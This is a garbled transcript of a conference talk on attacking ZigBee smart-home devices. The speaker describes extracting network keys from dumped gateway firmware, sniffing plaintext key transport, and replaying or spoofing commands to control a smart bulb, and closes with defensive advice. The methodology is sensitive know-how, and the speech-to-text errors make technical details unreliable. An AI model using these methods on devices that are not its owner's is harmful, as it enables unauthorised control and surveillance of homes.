 So today I will introduce you guys how to hack a ZQB device and I think you guys are really tired so I will make this quick, yeah. And well, in the speaker room somebody invited me to drink beer so I'm a little bit high. Yeah. So I'm from the Chihu company and the Unicron team and exactly we got the three topics in this DevCon so really cool. So Unicron team and we focused on the hardware and radio success and security and research. And we contained a lot of brilliant people that we focused on the anything that use radio technologies and from small things like RFID, NFC and WSN, something like that. And GPS, UIV, such as the drones, we hacked it, we let them landing in the, you know, Beijing such as, well, in America such as the White House, yeah. So during the research and we make a lot of products and we sell it on the vendor, well, actually we sold them out so maybe you guys haven't buy it. And well, let's just pass this page. And what is this, why this talk is relevant to you? So maybe you guys are hackers and you might be able to control your ZQB devices and without authorization and this talk will teach you how to hack it and such as your smoke sensor, your HIV system and well, if you control them or not yours and well, you can know everything. So what is ZQB? ZQB is just the only global wireless standard that it provides the foundation of the Internet of Things that by embedding a simple and smart object to work together and improve the comfort and efficiency in your everyday. So maybe you guys use some IoT devices and if you disassemble it, you will find oh, this is a ZQB chip. So it's just a wireless language that everyday device used to connect one from other and in fact the ZQB will be able to work in your home right now. So maybe someone buy a smoke alert, well, if you disassemble it, well, you might find one. So well, blah, blah, blah. Yeah. I suppose that you guys maybe, you know, somebody don't know what's the exhibit so I introduce it. So ZQB is widely used in the Internet of Things and it adapted in application that it requires low power consumption. And it will flexible the network technology. And so this is the ZQB's network and you got a star, you got a mesh and you got a tree and it's very different and we will introduce it later. So the most important thing in ZQB is this stack. So what is this stack? It's a specification and the implement of ZQB, a stack from the Texas Instructement that best the CC2530. Yeah. And which is the IEEE 80.15 and 0.4 embedded chip. Well, in other words, ZQB standard is right in Brexit while ZQB, the stack is writing code. So here is the chip and you can buy it on the Texas Instructement. Well, you can actually get it free on the line. So actually a lot of people that will research the security problem in ZQB and they have done a lot of things. ZQB, what I do is based on them. So thank you. And ZQB security is based on symmetric keys and both original letters and the reception and in a protected transition, you need to do the same key, just a simple key exchange. So if you're going to, you guys want to know more details, you can just download the document and your research on it. So here is a key distribution thing and you can pre-install it, you can transport it, you can establish it. Well, there are three key types, the master key, the linear key and the network key. So hacking ZQB step by step, here is what I want to say and what I want to teach you guys. And you know, here is the map that how the ZQB transfers the information from one to one. I think they, so share with you my simple presence. The following is the dynamic diagram, yeah. It's a smart body system that will, well, that's a very, very, that's what the vendor call is. But the audience will soon see it if it's not that smart. Yeah, we borrow it from the Internet. So here are the three normal control flows. Well, your phone connect with the IoT get away and the connect will blow. And all your phone connect the wireless router and the router will connect the IoT get away and connect the bottom. And the phone all just use the 4G or 3G or 2G, they Internet and connect to the server and connect the wireless router, then connect the IoT get away, then it's our target. So what we want is to directly control the both, our own ZQB node. That's just the ZQB node and to the bottom. So that's how we hack it. So the whole transmission is incredibly, so what we do is try to find the encryption key from the firmware. Yeah, actually, so you need to, if you want to find it, the first thing you need to do is to download the firmware. So the keys are stored in every node in the network. So as the firmware is harder to disassemble, so we chose to extract the key from the gateway. So here is the light and I tried to disassemble it, I cut it. Well, actually, finally I used the harm to smash it. Well, so I say, wow, this is a chip. Well, it doesn't work. It's broken. Yeah, it's my mistake. And I only got one of it. So before I smash ZQB, yeah, I try to disassemble the get away. So we disassembled the get away and we try to find, we try to dump the firmware. Okay, as the red arrow indicated, the debug interface is right here. And so we sort it on a few wires, we connect it in our debugger and we use the TI Smart IF flash program to dump the firmware. So if you guys could dump some firmware from your device where this debug is necessary. Okay, here is a screenshot of it. And it's a programmer software. Well, we got the firmware. So there's a lot of, you know, many things. So what should we do? Well, if you just trying to find the key from it, well, what you do is just to try to find your wedding rings from this garbage. So here is the way I try to find the inquiry key. So first, we set the keys to the distinct signature. Then find the firmware and see what if we could discover something interesting. So as the keys used to encrypt the package, so why do we not find the instruction that manipulates the keys? So let's try to reverse it. So we found that the instruction is just to restore the key that has relatively and fixed part and shown in the next slide. And therefore, the full consecutive movie instruction could be used as a file or signature for the address of the key. So here is the most important instructions that I don't know if you guys can see. So if you can see it clearly, maybe you can download the slide. Okay. So in this red screen, yeah, you can see it. So you can see the structures and the hex values. And that's the flow that I try to find out the key. And actually, there's two keys. The stored and the exchanged key. So if you guys want to hack it, then you need to find the two keys to decrypt the decrypted key . So we use this to as a signature. And so on the upper right corner, the instructions that manipulate the network key, the OX31 and OXAD. So it's the memory address that stores the keys. So as soon as the lower left corner. So on the upper right corner is the instructions that manipulate the network key. So it's shown. Oh, okay. This is really messy. So something going around in my laptop. I'm sorry. Yeah. That's the right thing. Yeah. It's just jumped up. Yeah. So then we use the full consecutive, the more instruction. The corresponding motion code and operand. So as it is for numbers as a file to search through the memory, through the firmware for address for the keys. So you guys can know where the keys are used and how to find it and how to decrypt it. Yeah. That's the screenshot of this. Show the possible address of the keys. So we will verify this case is that, is that what we want? So in order to verify this, we entitle the mic, the, you know, the message integrated check contents in the package. And if the decypher package can pass the mic, yeah. We consider that we find the right key. So let's just, so you can just write a simple script to verify it and, you know, put all the keys where they'll find and pass it over, pass it over. Well, bingo. That's it. So that's a sneaker used to capture the package. Yeah. We just, yeah. We buy it and we change a little of things. So the following screenshot shows the process that a new code joins the network. And the figure is quite self-explanatory. The network key is sending from the coordinator and to join the device in plain text, to plain text. And after receiving the network keys, the communication is immediately encrypted. So if it is decrypted, we can use the key that we find to decrypt it. Yeah. Here is a screenshot that we do this. So I want to say that after we found the key, we could do something dead mining to find the user habit because there could be a little bit of a factor. But the data following are some very, very practical attacks that we can perform. Well, we can analyze the deciphered data. We can replay and spoof. We can intercept. Yeah. We can just disassociation attack. So when we analyze the deciphered data, after we deciphered the data, in order to take control over the target device, we have to analyze the application level data and the result is following. So you can see the, if you want to control this, and you can know how, you know, the light, you can turn a different color. Here is the thing that you can, you can know how to control it yet. This is a bit. So the payload is 10 bytes in loss. And with the last bit being the XORR checksum of the 4-game byte, the byte 1 and byte 2 is the planet of the target device. Well, in our case, this is a bomb. So we can control this, this bomb in our own node. Well, this is the device that we use. Well, it's actually built up on our own. We just, you know, use the egg or software to draw it and we just print it out. So we can replay and spoof. So if you guys know the case, we use that to encrypt it, that we can just generate the same package to join the network and we can send the exactly same instructions to control this light. Yes, it will, this light will take, wow, you guys are the gateways. So now you can control me. So this is the text flow. And this questions is pretty hard. Yeah. So you can know that the NWK send instructions to the Mac and they got returns. Yeah. So you can now just, you know the questions. So you can just generate the exactly same questions that choose them to control it. So how do we protect or just, you know, prevent our device is hacked by this way? So you can know, you can know just the story of harsh of the encrypt, you can just know, you can know that if you just to store your encrypt keys that in your firmware, well, it's not safe. So you can just store a harsh of the encryption keys that in, in steps of the plain text and, you know, don't use the OTS, you know, yeah, AKA over the air key, providing the same and use pre-installed key, no detection instead. So blow the fuse to prevent the firmware from being dumped, such as use some security bolts and use the special protections to, to add, basically you guys don't have to leave a debug port on it. So every hack seems, wow, there's some things, wow, you can hack it. So don't leave it. So the employee of the, some light weights encrypt, employee the, some light weight encryption on the application data to make the analysis of the application data is hard after key comprised. So here you are. Actually, I'd like to say something else yet. Actually, this, this, this slide is not, this presentation is not mine and it's my call is, and well, actually, unfortunately, his visa was rejected by the VO. So he can't make it. So I, I just replace him and, well, actually, I, I'm not familiar with his work. I just see he, I always see, see his laptop and do something else. Well, actually, I don't know, wow, what are you guys doing? Yeah. So, and he sends me this slide that says, oh, no, you can't be, replace me. You can speak with me. Actually, I don't know what are you doing. So how do I replace for you? Yeah. So I'm really, really sorry about that. Yeah, yeah. So, actually, I did my, I have done, already done my presentation yesterday. It's about the famous cell. Yeah. It's actually, I, I'm familiar with my work, not his. Yeah. So, actually, here is the, you know, here is the, the, the worker that my colleague, former colleague that helped him a lot. And, well, actually, this is, you know, if you guys to want to know, want to know more details that you can contact with the Twitter or the emails, that's okay. So, I'm really sorry about him. I think that is, this which ended, I should ask him from, hey, can you invite me to, to a lunch? And then, you know, I did a lot. Yeah. I'm very nervous. Because this is my work. Yeah, I'm sorry. Yeah. So, thank you. So if you guys have got a question, I think I can answer. I'm sorry. Yeah. Thank you. I appreciate it.